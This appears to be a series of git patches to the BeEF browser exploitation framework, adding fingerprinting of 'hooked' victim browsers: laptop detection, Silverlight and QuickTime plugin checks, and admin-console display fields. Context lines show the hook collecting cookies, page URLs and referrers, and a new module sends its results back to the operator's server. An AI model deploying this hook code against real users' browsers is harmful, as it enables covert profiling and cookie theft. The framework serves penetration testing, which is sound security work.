zwh<;C<R>By%U>H^#9etf;I{m|EC`sOd3{gupK)jxAnEQ)K7%%Ml=<#C-o(XPV8RAA
zvp)yX&faBwK<g;YzYp}7gLGSo+Qa!vyGhPkxFo6(R^KeEC=ZR7id9cHO5VLEf&ABR
z=UEERr66#<)m}oArtTYJfY#2Qq4*_S{u$5b1hqXnP*Bf}uk@Y2P!sxC&-JYU-Ny--
zUk@I4lP;SU^^!4h4EcAIyS*jQ;GxF`{C2`@A&lIx{mRj%u$dLH%O$HV1(Qx!C`%pP
zIylO<%GpjhY<Q!`PeC?M-iES4Gr&&Go8A?_#<)*`d46rzXa5aH{areIAIPAm>2!-X
zb^X}_coL$HBlI;~eh}YXKM}L=DzVF08`wIC`>OT#y)aGQIXp#*k+xGFUPN8*usOrO
z5_BI^vIC_Nq=-;hm+UeJbfCColZ?kDom*C;E{=ix?G}8qR;6*2DmG+-9#dNP8WPsB
z61-ww{8>3>1uIq5+;~%8JX$IeF@Esy{hfeh@KrU&QmC|fv+(xm_}vuPeoo}p*?IB&
z&pChLreTW+K>Bvb;6=lVL|a{p+fmR%b`jKtULLDl;;ftiz%k&xK^%|CgFIq#CAoi@
zXukFmm#6YNEHmYMk$RP_c{JJVv7aALRa9k3$Nymb6#bMH`Gm(@2l)bfrF->eIqr`>
z2Dw2rvk{Td$TAYi9*ROFwYnPCOmXDas8|+ZVu;3s1J(OQ8}<7h0MO(O7c7dTACoCL
z4MZ>%U7$NbK-EN~X23B&dO7be3YPFMb6$g;Z$gDnMs^~@$eeu|%_)dmx!@sR6Z|#f
zrp*O4AIvFq_7?f*XS*e*j6p**>rM6BrEYE$nsb`pCgL=vm~7Z%dKU6Qh;o8Y{(X1M
zC;w*(;#$qQG9@~lfwmZhRewbLaAK%8VYfV7tADw|&~@wV=*uHUeq7`%dMMox{#2!G
z8XMNN;PGy>Dl2QV(zvF&@<wU;;@he2)Cw{x8D;Q&)Ag=}4byFUJ^h#pNRm;Q2ef`@
zGYdKX_mQEIWomN#87xn7*ndij{*$*b6+A`y7VTDF+xGGNbkNM3bT7F06k<E=@;1F0
zqY;%>yD&y6JGy!pp%^JdBvd1+xiFX2*N0)-%6FvgD0u6_Un!Z|Qr1K9VpQic0fJPe
z8gTt%iw%DsYQN$I=kCv!YwVD2f3$OX_i(5cBs&z62+U?Tpy{RWzdZJ+KVKlP|6*Rc
z?o2V{Hg;-)V);mV_0hf=zb7WR$)r$Cz?u$FjzjJPkS2fm7E-CMhMgX2{N0i=Jv7wE
zP*%$M%3RC=`VrG*R@#3E(n0?{41?-KTo^ep)N4hG42=w*k8Iaa>sMO8O3}=kvGFA-
zAyS+Ijw@KK{mwVnVft@OLY9^`*b_KhV0F=nB_F@s>tn3TfDievwB~ALy+*+0rp@`J
z?zdGLJG>QLrO{x*zgSan{<qMeOV%j_A$g&vvgktY<iKFO8VbQ!yHsUvH2&=p00-zm
z0*#I2<ZWn0QR|IKC3kDl$r3sb0$w)%Xx0!#zZ?EJDVp)Te@4exFQx^FFT8GZ`^m?t
zQsrY>T1>Ka8&6X20DJk@(R)=Ht68SYyM%X!im!IZ5;jz#-2xFBQ{10xu6|<oVIl#Q
z$4D5)56`i2D*OT2eZ*qkA{Cez+(lERRN7EV=RO&Lxp#TRrzEpFFz)<!bUdA)7O2XS
zqc}(v-VM|v3_Rv;;D}dkQk^9E1c_85xY0DLS&S!xJrtzlVFw@_Q-lIf>w^N!JSoo;
z-XR2OE??C=c+lM3Hm>@~Ud$HXCG!GgJu*4)4J@#dB?RrpMTQ4iPJf-b{~d4**j)8z
zlMpMRP|%842fq+-NH{J{92wkHa}Z78h?-K`kMX-+_a;I&jNM<qE>OSvcN+&Bko=nU
z-z>^^B6gtf)O-18{t%O_zg)kpL`ov4&_4;|?_D|(<n^C~&*ctm;-j@ONRw8l1WD>8
z)A9AsIE8otyq_$J*0+aROn8P+6S6xFZIZpB0&Y-n%r-b2j<C{)QDwy1z8CreQIg;v
z?`)Tr_*NBw?L#8NSbYp+Ws0)OrLaP!Wr^)3HK0fX|EwZKH_Tk`+6B)nZ`Cotnu?n@
z!xFLCGqKzglAh6pbaXbIY#{|om-0BjH4th|-Ps(FHU8K4gLhAItF*{L_|N8C4-Wiv
z@hIK4_`N=&Vryzj1MjZMX!~<;^9Z^UTi|U%4erGS0Rj&hd{zFxv9!*_H7#)>fke_g
zx#_EHJ(^@%+-dI8RMs;cyoLw|J^e7R{AjN=B^;P|gDy_#?KuqE-xGn|_0$+gTS-nd
z<&_+-5g>HZF|2=+!h`P{CqG5szp=jMDB5}v|0L|vM7))T<OAz;T%W}Up9XWU#npw^
zbv|Fa$}RH}{be3KUf#P5OM2EkI4NRA_VsXis=Nv;)d%Z-L^za(27gLu3;@NQ_Ena8
zFme*7D<dNQXB-h2aK+%RJs?@#{7(zR^VW<Krl5eg1zOCi{UN@1{Z8=Mu!3S!ltDqM
zPQMT9O&&J}tYhqmag%61LT)+RF5@6=0)Wj0e;wY1!@=YehrZ&eB+Tb;r=&o1qYH6k
ziXXyi=kvTdP`q-M^az3fz4KPDVNY5HK^^l60LyF*?Fr)6f|yoqKNC0{ynG~O%lI`g
n9SGPW0Hj$2bpJm-F8%>`LZ103;&}N0FxPVxZRKi3oACbwIW_8R

literal 0
HcmV?d00001


From 2c10dd040c9f68ebad1ae71fd7e20135d2b26594 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 03:55:14 +1030
Subject: [PATCH 185/397] Add 'beef.hardware.isLaptop()'

---
 core/main/client/browser.js        | 4 ++--
 core/main/client/hardware.js       | 9 +++++++++
 core/main/models/browserdetails.rb | 1 +
 3 files changed, 12 insertions(+), 2 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 34701d3ab..c32e0fd24 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -967,9 +967,9 @@ return !!window.devicePixelRatio && !!window.history.replaceState && window.navi
 		var browser_version = beef.browser.getBrowserVersion();
 		var browser_reported_name = beef.browser.getBrowserReportedName();
 		var cookies = document.cookie;
-		var page_title = (document.title) ? document.title : "";
+		var page_title = (document.title) ? document.title : "Unknown";
 		var page_uri = document.location.href;
-		var page_referrer = (document.referrer) ? document.referrer : "";
+		var page_referrer = (document.referrer) ? document.referrer : "Unknown";
 		var hostname = document.location.hostname;
 		var hostport = (document.location.port)? document.location.port : "80";
 		var browser_plugins = beef.browser.getPlugins();
diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
index 50ff77d41..936d4c712 100644
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -31,6 +31,14 @@ beef.hardware = {
 		return false;
 	},
 
+	isLaptop: function() {
+		// Most common laptop screen resolution
+		if (screen.width == 1366 && screen.height == 768) return true;
+		// Netbooks
+		if (screen.width == 1024 && screen.height == 600) return true;
+		return false;
+	},
+
 	isNokia: function() {
 		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
 	},
@@ -106,6 +114,7 @@ beef.hardware = {
                 if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
                 if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
                 if(DetectXbox())                            { return "Xbox"};
+				if(this.isLaptop())							{ return "Laptop"};
                 if(this.isVirtualMachine())                 { return "Virtual Machine"};
 
 		return 'Unknown';
diff --git a/core/main/models/browserdetails.rb b/core/main/models/browserdetails.rb
index 7ec413eb7..93d290e8c 100644
--- a/core/main/models/browserdetails.rb
+++ b/core/main/models/browserdetails.rb
@@ -105,6 +105,7 @@ module Models
       ua_string = get(session_id, 'BrowserReportedName')
       hardware  = get(session_id, 'Hardware')
       return BeEF::Core::Constants::Hardware::HW_VM_IMG if hardware =~ /Virtual Machine/
+      return BeEF::Core::Constants::Hardware::HW_LAPTOP_IMG if hardware =~ /Laptop/
       return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
 
       return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR

From 95970d536481dc484c42e162890908d0ec81034e Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 04:42:13 +1030
Subject: [PATCH 186/397] Add 'beef.browser.hasSilverlight()'

Add 'modules/browser/detect_silverlight'
---
 core/main/client/browser.js                   | 24 ++++++++++++++++++-
 core/main/handlers/browserdetails.rb          |  8 +++++++
 .../admin_ui/controllers/modules/modules.rb   | 15 ++++++++++++
 extensions/console/lib/shellinterface.rb      | 15 ++++++++++++
 modules/browser/detect_silverlight/command.js | 14 +++++++++++
 .../browser/detect_silverlight/config.yaml    | 15 ++++++++++++
 modules/browser/detect_silverlight/module.rb  | 14 +++++++++++
 7 files changed, 104 insertions(+), 1 deletion(-)
 create mode 100644 modules/browser/detect_silverlight/command.js
 create mode 100644 modules/browser/detect_silverlight/config.yaml
 create mode 100644 modules/browser/detect_silverlight/module.rb

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index c32e0fd24..13ab2814b 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -988,6 +988,7 @@ return !!window.devicePixelRatio && !!window.history.replaceState && window.navi
 		var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
 		var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No";
 		var has_activex = (beef.browser.hasActiveX())? "Yes":"No";
+		var has_silverlight = (beef.browser.hasSilverlight())? "Yes":"No";
 		var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie"))? "Yes":"No";
 		var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie"))? "Yes":"No";
 
@@ -1016,6 +1017,7 @@ return !!window.devicePixelRatio && !!window.history.replaceState && window.navi
 		if(has_web_socket) details['HasWebSocket'] = has_web_socket
 		if(has_googlegears) details['HasGoogleGears'] = has_googlegears
 		if(has_activex) details['HasActiveX'] = has_activex;
+		if(has_silverlight) details['HasSilverlight'] = has_silverlight;
 		if(has_session_cookies) details["hasSessionCookies"] = has_session_cookies;
 		if(has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies;
 
@@ -1023,12 +1025,32 @@ return !!window.devicePixelRatio && !!window.history.replaceState && window.navi
 	},
 
 	/**
-	 * Returns boolean value depending on whether the browser support ActiveX
+	 * Returns boolean value depending on whether the browser supports ActiveX
 	 */
 	hasActiveX: function() {
 		return !!window.ActiveXObject;
 	},
 
+	/**
+	 * Returns boolean value depending on whether the browser supports Silverlight
+	 */
+	hasSilverlight: function() {
+		var result = false;
+
+		try {
+			if (beef.browser.isIE()) {
+				var slControl = new ActiveXObject('AgControl.AgControl');
+				result = true;
+			} else if (navigator.plugins["Silverlight Plug-In"]) {
+				result = true;
+			}
+		} catch (e) {
+			result = false;
+		}
+
+		return result;
+	},
+
 	/**
 	 * Returns array of results, whether or not the target zombie has visited the specified URL
 	 */
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 3ac0b3409..743587b3a 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -255,6 +255,14 @@ module BeEF
             self.err_msg "Invalid value for HasActiveX returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasSilverlight
+          has_silverlight = get_param(@data['results'], 'HasSilverlight')
+          if BeEF::Filters.is_valid_yes_no?(has_silverlight)
+            BD.set(session_id, 'HasSilverlight', has_silverlight)
+          else
+            self.err_msg "Invalid value for Silverlight returned from the hook browser's initial connection."
+          end
+
           # get and store the value for CPU
           cpu_type = get_param(@data['results'], 'CPU')
           if !cpu_type.nil?
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 2a3daa27d..932128f62 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -405,6 +405,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         'from' => 'Initialization'
       }
 
+      summary_grid_hash['results'].push(page_name_row) # add the row
+    end
+
+    # set and add the yes|no value for HasSilverlight
+    has_silverlight = BD.get(zombie_session, 'HasSilverlight')
+    if not has_silverlight.nil?
+      encoded_has_silverlight = CGI.escapeHTML(has_silverlight)
+      encoded_has_silverlight_hash = { 'Has Silverlight' => encoded_has_silverlight }
+
+      page_name_row = {
+        'category' => 'Browser',
+        'data' => encoded_has_silverlight_hash,
+        'from' => 'Initialization'
+      }
+
       summary_grid_hash['results'].push(page_name_row) # add the row
     end
 
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index a84f7022a..7f2442ecd 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -617,6 +617,21 @@ class ShellInterface
       summary_grid_hash['results'].push(page_name_row) # add the row
     end
 
+    # set and add the yes|no value for HasSilverlight
+    has_silverlight = BD.get(zombie_session, 'HasSilverlight')
+    if not has_silverlight.nil?
+      encoded_has_silverlight = CGI.escapeHTML(has_silverlight)
+      encoded_has_silverlight_hash = { 'Has Silverlight' => encoded_has_silverlight }
+
+      page_name_row = {
+        'category' => 'Browser',
+        'data' => encoded_has_silverlight_hash,
+        'from' => 'Initialization'
+      }
+
+      summary_grid_hash['results'].push(page_name_row) # add the row
+    end
+
     # set and add the value for CPU
     cpu_type = BD.get(zombie_session, 'CPU')
     if not cpu_type.nil?
diff --git a/modules/browser/detect_silverlight/command.js b/modules/browser/detect_silverlight/command.js
new file mode 100644
index 000000000..a56d0c2bc
--- /dev/null
+++ b/modules/browser/detect_silverlight/command.js
@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = (beef.browser.hasSilverlight())? "Yes" : "No";
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "silverlight="+result);
+
+});
+
diff --git a/modules/browser/detect_silverlight/config.yaml b/modules/browser/detect_silverlight/config.yaml
new file mode 100644
index 000000000..93dbbbefc
--- /dev/null
+++ b/modules/browser/detect_silverlight/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_silverlight:
+            enable: true
+            category: "Browser"
+            name: "Detect Silverlight"
+            description: "This module will check if the browser has Silverlight support."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/browser/detect_silverlight/module.rb b/modules/browser/detect_silverlight/module.rb
new file mode 100644
index 000000000..0565a18ed
--- /dev/null
+++ b/modules/browser/detect_silverlight/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_silverlight < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['silverlight'] = @datastore['silverlight']
+		save content
+	end
+
+end

From 449c6633aa60c4061dbbe6600a4d516f867c569f Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 05:24:48 +1030
Subject: [PATCH 187/397] Rename 'System Platform' to 'Browser Platform'

---
 core/main/client/browser.js                   |  4 ++--
 core/main/handlers/browserdetails.rb          |  6 +++---
 core/main/rest/handlers/hookedbrowsers.rb     | 20 +++++++++----------
 .../admin_ui/controllers/modules/modules.rb   |  6 +++---
 extensions/console/lib/shellinterface.rb      |  6 +++---
 5 files changed, 21 insertions(+), 21 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 13ab2814b..124b5c911 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -977,7 +977,7 @@ return !!window.devicePixelRatio && !!window.history.replaceState && window.navi
 		var os_name = beef.os.getName();
 		var hw_name = beef.hardware.getName();
 		var cpu_type = beef.hardware.cpuType();
-		var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
+		var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
 		var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
 		var screen_size = beef.browser.getScreenSize();
 		var window_size = beef.browser.getWindowSize();
@@ -1006,7 +1006,7 @@ return !!window.devicePixelRatio && !!window.history.replaceState && window.navi
 		if(hw_name) details['Hardware'] = hw_name;
 		if(cpu_type) details['CPU'] = cpu_type;
 		if(date_stamp) details['DateStamp'] = date_stamp;
-		if(system_platform) details['SystemPlatform'] = system_platform;
+		if(browser_platform) details['BrowserPlatform'] = browser_platform;
 		if(browser_type) details['BrowserType'] = browser_type;
 		if(screen_size) details['ScreenSize'] = screen_size;
 		if(window_size) details['WindowSize'] = window_size;
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 743587b3a..dbce1ad87 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -168,11 +168,11 @@ module BeEF
           end
 
           # get and store the system platform
-          system_platform = get_param(@data['results'], 'SystemPlatform')
+          system_platform = get_param(@data['results'], 'BrowserPlatform')
           if BeEF::Filters.is_valid_system_platform?(system_platform)
-            BD.set(session_id, 'SystemPlatform', system_platform)
+            BD.set(session_id, 'BrowserPlatform', system_platform)
           else
-            self.err_msg "Invalid system platform returned from the hook browser's initial connection."
+            self.err_msg "Invalid browser platform returned from the hook browser's initial connection."
           end
 
           # get and store the hooked browser type
diff --git a/core/main/rest/handlers/hookedbrowsers.rb b/core/main/rest/handlers/hookedbrowsers.rb
index d465c5031..8007ae35a 100644
--- a/core/main/rest/handlers/hookedbrowsers.rb
+++ b/core/main/rest/handlers/hookedbrowsers.rb
@@ -72,15 +72,15 @@ module BeEF
            details = BeEF::Core::Models::BrowserDetails
 
            {
-               'id' => hb.id,
-               'session' => hb.session,
-               'name' => details.get(hb.session, 'BrowserName'),
-               'version' => details.get(hb.session, 'BrowserVersion'),
-               'os' => details.get(hb.session, 'OsName'),
-               'platform' => details.get(hb.session, 'SystemPlatform'),
-               'ip' => hb.ip,
-               'domain' => details.get(hb.session, 'HostName'),
-               'port' => hb.port.to_s,
+               'id'       => hb.id,
+               'session'  => hb.session,
+               'name'     => details.get(hb.session, 'BrowserName'),
+               'version'  => details.get(hb.session, 'BrowserVersion'),
+               'os'       => details.get(hb.session, 'OsName'),
+               'platform' => details.get(hb.session, 'BrowserPlatform'),
+               'ip'       => hb.ip,
+               'domain'   => details.get(hb.session, 'HostName'),
+               'port'     => hb.port.to_s,
                'page_uri' => details.get(hb.session, 'PageURI')
            }
         end
@@ -88,4 +88,4 @@ module BeEF
       end
     end
   end
-end
\ No newline at end of file
+end
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 932128f62..073866149 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -240,14 +240,14 @@ class Modules < BeEF::Extension::AdminUI::HttpController
       summary_grid_hash['results'].push(page_name_row) # add the row
     end
     
-    # set and add the System Platform
-    system_platform = BD.get(zombie_session, 'SystemPlatform')
+    # set and add the Browser Platform
+    system_platform = BD.get(zombie_session, 'BrowserPlatform')
     if not system_platform.nil?
       encoded_system_platform = CGI.escapeHTML(system_platform)
       encoded_system_platform_hash = { 'System Platform' => encoded_system_platform }
 
       page_name_row = {
-        'category' => 'Host',
+        'category' => 'Browser',
         'data' => encoded_system_platform_hash,
         'from' => 'Initialization'
       }
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index 7f2442ecd..7bece695b 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -455,13 +455,13 @@ class ShellInterface
     end
     
     # set and add the System Platform
-    system_platform = BD.get(self.targetsession, 'SystemPlatform')
+    system_platform = BD.get(self.targetsession, 'BrowserPlatform')
     if not system_platform.nil?
       encoded_system_platform = CGI.escapeHTML(system_platform)
-      encoded_system_platform_hash = { 'System Platform' => encoded_system_platform }
+      encoded_system_platform_hash = { 'Browser Platform' => encoded_system_platform }
 
       page_name_row = {
-        'category' => 'Host',
+        'category' => 'Browser',
         'data' => encoded_system_platform_hash,
         'from' => 'Initialization'
       }

From 8b56a147a9c180dbec3b7be444c166a98be4fab6 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 05:28:49 +1030
Subject: [PATCH 188/397] Rename 'System Platform' to 'Browser Platform' in UI

---
 extensions/admin_ui/controllers/modules/modules.rb | 2 +-
 extensions/console/lib/shellinterface.rb           | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 073866149..86669173e 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -244,7 +244,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
     system_platform = BD.get(zombie_session, 'BrowserPlatform')
     if not system_platform.nil?
       encoded_system_platform = CGI.escapeHTML(system_platform)
-      encoded_system_platform_hash = { 'System Platform' => encoded_system_platform }
+      encoded_system_platform_hash = { 'Browser Platform' => encoded_system_platform }
 
       page_name_row = {
         'category' => 'Browser',
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index 7bece695b..6c3ffd5a7 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -454,7 +454,7 @@ class ShellInterface
       summary_grid_hash['results'].push(page_name_row) # add the row
     end
     
-    # set and add the System Platform
+    # set and add the Browser Platform
     system_platform = BD.get(self.targetsession, 'BrowserPlatform')
     if not system_platform.nil?
       encoded_system_platform = CGI.escapeHTML(system_platform)

From ce1cc61ac199905f39426e927152819840c16233 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 05:47:07 +1030
Subject: [PATCH 189/397] Add ActiveX and Silverlight to zombie balloon details

---
 .../admin_ui/controllers/panel/panel.rb       | 50 ++++++++++---------
 .../media/javascript/ui/panel/ZombiesMgr.js   |  4 ++
 2 files changed, 31 insertions(+), 23 deletions(-)

diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index 72c2c8bc1..65ad7a541 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -76,37 +76,41 @@ module BeEF
           # create a hash of simple hooked browser details
           def get_simple_hooked_browser_hash(hooked_browser)
 
-            browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
+            browser_name    = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
             browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion')
-            browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
-            os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
-            os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
-            hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
-            hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
-            domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
-            has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
+            browser_icon    = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
+            os_icon         = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
+            os_name         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
+            hw_icon         = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
+            hw_name         = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
+            domain          = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
+            has_flash       = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
             has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
             has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
-            has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
-            date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
+            has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
+            has_activex     = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
+            has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
+            date_stamp      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
 
             return {
-                'session' => hooked_browser.session,
-                'ip' => hooked_browser.ip,
-                'domain' => domain,
-                'port' => hooked_browser.port.to_s,
-                'browser_name' => browser_name,
+                'session'         => hooked_browser.session,
+                'ip'              => hooked_browser.ip,
+                'domain'          => domain,
+                'port'            => hooked_browser.port.to_s,
+                'browser_name'    => browser_name,
                 'browser_version' => browser_version,
-                'browser_icon' => browser_icon,
-                'os_icon' => os_icon,
-                'os_name' => os_name,
-                'hw_icon' => hw_icon,
-                'hw_name' => hw_name,
-                'has_flash' => has_flash,
+                'browser_icon'    => browser_icon,
+                'os_icon'         => os_icon,
+                'os_name'         => os_name,
+                'hw_icon'         => hw_icon,
+                'hw_name'         => hw_name,
+                'has_flash'       => has_flash,
                 'has_web_sockets' => has_web_sockets,
                 'has_googlegears' => has_googlegears,
-                'has_java' => has_java,
-                'date_stamp' => date_stamp
+                'has_java'        => has_java,
+                'has_activex'     => has_activex,
+                'has_silverlight' => has_silverlight,
+                'date_stamp'      => date_stamp
             }
 
           end
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index 6b1c8587a..a30f9cc4c 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -27,6 +27,8 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
         var has_java           = zombie_array[index]["has_java"];
+		var has_activex        = zombie_array[index]["has_activex"];
+		var has_silverlight    = zombie_array[index]["has_silverlight"];
 		var date_stamp         = zombie_array[index]["date_stamp"];
 
 		text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
@@ -42,6 +44,8 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Flash: "          + has_flash;
         balloon_text+= "<br/>Java: "           + has_java;
         balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>ActiveX: "        + has_activex;
+		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
 		balloon_text+= "<br/>Google Gears: "   + has_googlegears;
 		balloon_text+= "<br/>Date: "           + date_stamp;
 		

From f7b55be03a7af4a23df7a8026fbf07cd0bbcc134 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 3 Feb 2013 05:59:06 +1030
Subject: [PATCH 190/397] Add 'beef.browser.hasQuickTime()'

Merged manually from https://github.com/beefproject/beef/pull/836

Fix issue #835

starting
---
 core/main/client/browser.js | 38 +++++++++++++++++++++++++++++++++++++
 1 file changed, 38 insertions(+)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 124b5c911..497cd2099 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -671,6 +671,44 @@ return !!window.devicePixelRatio && !!window.history.replaceState && window.navi
 		}
 	},
 
+	/**
+	 * Checks if the zombie has the QuickTime plugin installed.
+	 * @return: {Boolean} true or false.
+	 *
+	 * @example: if ( beef.browser.hasQuickTime() ) { ... }
+	 */
+	hasQuickTime: function() {
+		
+		var quicktime = false;
+		
+		// Not Internet Explorer
+		if ( !this.type().IE ) {
+			
+			for ( i=0; i < navigator.plugins.length; i++ ) {
+				
+				if ( navigator.plugins[i].name.indexOf("QuickTime") >= 0 ) {
+					quicktime = true;
+				}
+				
+			}
+		
+		// Internet Explorer
+		} else {
+			
+			try {
+				
+				var qt_test = new ActiveXObject('QuickTime.QuickTime');
+				
+			} catch (e) { }
+			
+			if ( qt_test ) { quicktime = true; }
+			
+		}
+		
+		return quicktime;
+		
+	},
+
 	/**
 	 * Checks if the zombie has Java enabled.
  	 * @return: {Boolean} true or false.

From fdf3dff690acec1b1d00ab0d85ac82b4793659d1 Mon Sep 17 00:00:00 2001
From: radoen <scream1988@gmail.com>
Date: Sat, 2 Feb 2013 22:07:28 +0100
Subject: [PATCH 191/397] ISSUES #817

to refine UI rendering.

Note In FF 21.xx the old detection method correctly work yet
---
 core/main/client/browser.js | 3142 +++++++++++++++++++++++------------
 1 file changed, 2092 insertions(+), 1050 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 497cd2099..f6d1ff970 100644
